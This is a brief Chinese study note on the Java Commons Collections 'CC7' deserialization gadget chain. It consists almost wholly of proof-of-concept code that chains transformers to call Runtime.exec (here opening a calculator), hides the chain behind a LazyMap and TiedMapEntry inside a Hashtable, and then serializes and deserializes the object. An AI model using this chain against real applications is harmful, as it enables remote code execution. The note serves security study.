Java反序列化之CC7

没什么好说的，这条链子也很简单，起点是Hashtable

    public static void main(String[] argc) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        ChainedTransformer chainedTransformer = new ChainedTransformer(
                new Transformer[]{
                        new ConstantTransformer(Runtime.class),
                        new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a calculator"}),
                        new ConstantTransformer(123)
                }
        );
        Map lazyMap = LazyMap.decorate(new HashMap<Object, Object>(), chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(new HashMap<Object, Object>(), 1);
        Hashtable hashtable = new Hashtable<Object, Object>();
        hashtable.put(tiedMapEntry, 1);

        Field field = TiedMapEntry.class.getDeclaredField("map");
        field.setAccessible(true);
        field.set(tiedMapEntry, lazyMap);

        serialize(hashtable);
        unserialize("ser.bin");
    }